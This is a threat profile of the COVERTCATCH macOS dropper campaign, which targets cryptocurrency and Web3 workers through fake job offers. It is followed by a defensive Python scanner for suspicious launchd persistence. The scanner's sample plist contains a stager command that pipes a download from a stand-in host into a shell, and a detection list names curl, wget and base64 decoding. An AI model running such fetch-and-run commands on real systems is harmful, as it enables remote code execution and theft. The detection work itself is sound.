| COVERTCATCH | |
| --- | --- |
| Type of Malware | Dropper |
| Country of Origin | North Korea |
| Date of Initial Activity | 2024 |
| Motivation | Cyberwarfare |
| Attack Vectors | Phishing |
| Type of Information Stolen | Cryptocurrencies |
| Targeted Systems | macOS |
Overview
The COVERTCATCH campaign is a sophisticated and stealthy cybercriminal operation that has been actively targeting individuals and organizations involved in Web3 technologies, including cryptocurrency exchanges and decentralized finance (DeFi) projects. The campaign is notable for its use of social engineering, specifically fake job recruitment efforts, to deliver malware. This method gives the threat actors initial access to targeted systems and sets the stage for further infiltration, which can include the theft of sensitive data and digital assets. The COVERTCATCH malware, disguised as innocent-looking coding challenges or job-related documents, is often delivered via platforms like LinkedIn, where attackers engage potential victims in convincing conversations before deploying malicious payloads.
Targets
Individuals
Finance and Insurance
Information
How they operate
Once the victim runs the disguised file, the malware establishes an initial foothold and drops additional payloads. One of the primary techniques used by COVERTCATCH is the deployment of a remote access Trojan (RAT) that gives the attackers full control over the compromised system. This RAT is capable of bypassing security measures such as antivirus software and firewalls by using obfuscation techniques. COVERTCATCH malware often operates in a manner that avoids detection by traditional security tools, for example by encrypting its communications or using polymorphic code to change its appearance with each infection. This makes it difficult for both users and automated security systems to identify and neutralize the threat quickly.
Once installed, the COVERTCATCH malware establishes communication with a command-and-control (C2) server, typically located on the dark web. The C2 server allows the attackers to issue commands, upload additional malicious tools, and exfiltrate sensitive information from the infected machine. One of the key objectives of the malware is to harvest valuable data, including credentials and private keys related to cryptocurrency wallets and decentralized finance (DeFi) platforms. The attackers use this information to gain access to digital assets and initiate unauthorized transfers. In some instances, the malware is designed to target specific Web3 infrastructure, such as cloud environments or decentralized exchanges, further enhancing the attack’s effectiveness.
To ensure persistence and avoid detection, the COVERTCATCH malware often includes rootkit-like capabilities that enable it to remain hidden within the system even after reboot. Additionally, it can disable system security tools, monitor network traffic for signs of detection, and self-update to counteract efforts to remove it. The malware can also create encrypted tunnels to maintain secure communication with its C2 server, making it difficult for defenders to block or trace these interactions. This sophisticated, layered approach ensures that COVERTCATCH remains a persistent threat in the Web3 ecosystem, capable of executing long-term operations with minimal chances of being caught. The technical expertise behind the COVERTCATCH campaign demonstrates the evolving nature of cyber threats targeting high-value targets within the cryptocurrency and blockchain sectors.
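The persistence behaviour described above (a component that comes back after every reboot on macOS) is something a defender can hunt for directly, because launchd only reads jobs from a handful of LaunchAgents and LaunchDaemons directories. The script below is an added example written for this page, not code from the original profile or from any vendor's report. It parses each launchd job plist and flags the patterns a dropper-style job tends to show: a program or argument that points into a temporary or world-writable location, a command that pulls or decodes a further payload, or a relative program path. The sample jobs, labels and paths embedded in it are constructed for the self-check and are not indicators from this campaign.

```python
"""Triage macOS launchd persistence entries for dropper-style artifacts.

Added example, not part of the original COVERTCATCH write-up. Scans
LaunchAgents / LaunchDaemons plists and reports jobs that look like a
dropper's reboot persistence. On macOS, run it with no arguments; on
other systems the real directories do not exist and are skipped.
"""
import plistlib
import tempfile
from pathlib import Path

# Locations where a legitimate daemon's binary or script rarely lives.
SUSPICIOUS_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/",
                       "/Users/Shared/", "/private/var/folders/")
# Stager-style fragments: the job fetches or decodes something else.
PAYLOAD_WORDS = ("curl ", "wget ", "base64 -d", "base64 --decode", "osascript -e")

# Constructed sample jobs (hypothetical labels and paths, not real IoCs).
SAMPLE_JOBS = {
    "com.example.updater.plist": {   # benign: vendor binary under /Library
        "Label": "com.example.updater",
        "ProgramArguments": ["/Library/Application Support/Example/updater", "--check"],
        "RunAtLoad": True,
    },
    "com.example.helper.plist": {    # dropper-like: shell stager run from /tmp
        "Label": "com.example.helper",
        "ProgramArguments": ["/bin/sh", "-c",
                             "/tmp/.helper && curl -s http://example.invalid/p | sh"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
}


def default_dirs():
    """The directories launchd reads at boot/login (real macOS paths)."""
    dirs = [Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons")]
    try:
        dirs.append(Path.home() / "Library" / "LaunchAgents")
    except RuntimeError:  # no resolvable home directory in this environment
        pass
    return dirs


def job_argv(plist: dict) -> list:
    """Return the argv launchd would execute for this job."""
    if "ProgramArguments" in plist:
        return [str(a) for a in plist["ProgramArguments"]]
    return [str(plist["Program"])] if plist.get("Program") else []


def findings_for(plist: dict) -> list:
    """Return reasons this job looks like dropper persistence (empty = nothing notable)."""
    argv = job_argv(plist)
    cmd = " ".join(argv)
    first = argv[0] if argv else ""
    reasons = []
    prefix = next((p for p in SUSPICIOUS_PREFIXES if p in cmd), None)
    if prefix:
        reasons.append(f"references writable/temp location {prefix}")
    word = next((w for w in PAYLOAD_WORDS if w in cmd.lower()), None)
    if word:
        reasons.append(f"stager pattern in command: {word!r}")
    if first and not first.startswith("/"):
        reasons.append(f"relative program path: {first!r}")
    return reasons


def scan_dir(directory: Path) -> dict:
    """Map each notable plist path under `directory` to its list of reasons."""
    hits = {}
    if not directory.is_dir():
        return hits
    for path in sorted(directory.glob("*.plist")):
        try:
            with open(path, "rb") as fh:
                plist = plistlib.load(fh)
        except Exception as exc:  # a plist launchd cannot parse is itself worth a look
            hits[str(path)] = [f"unparseable plist: {exc}"]
            continue
        reasons = findings_for(plist)
        if reasons:
            if plist.get("RunAtLoad"):
                reasons.append("RunAtLoad set: job runs again after every reboot")
            if plist.get("KeepAlive"):
                reasons.append("KeepAlive set: launchd restarts it if it is killed")
            hits[str(path)] = reasons
    return hits


def scan_paths(dirs=None) -> dict:
    """Scan every launchd directory and merge the results."""
    hits = {}
    for d in (dirs or default_dirs()):
        hits.update(scan_dir(Path(d)))
    return hits


def write_samples(directory: Path) -> Path:
    """Write the constructed SAMPLE_JOBS as XML plists into `directory`."""
    directory.mkdir(parents=True, exist_ok=True)
    for name, job in SAMPLE_JOBS.items():
        with open(directory / name, "wb") as fh:
            plistlib.dump(job, fh)
    return directory


def demo_scan() -> dict:
    """Self-check: scan the constructed samples in a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_dir(write_samples(Path(tmp) / "LaunchAgents"))


if __name__ == "__main__":
    results = scan_paths() or demo_scan()   # fall back to the samples off-macOS
    for path, reasons in results.items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

A job matching these heuristics is a lead, not a verdict: confirm it by checking who owns the referenced binary, when the plist was written relative to the user's recent downloads, and whether `launchctl list` shows it loaded. The benign sample passes precisely because its program lives under `/Library` with no stager fragments, which is the baseline a triage rule should tolerate.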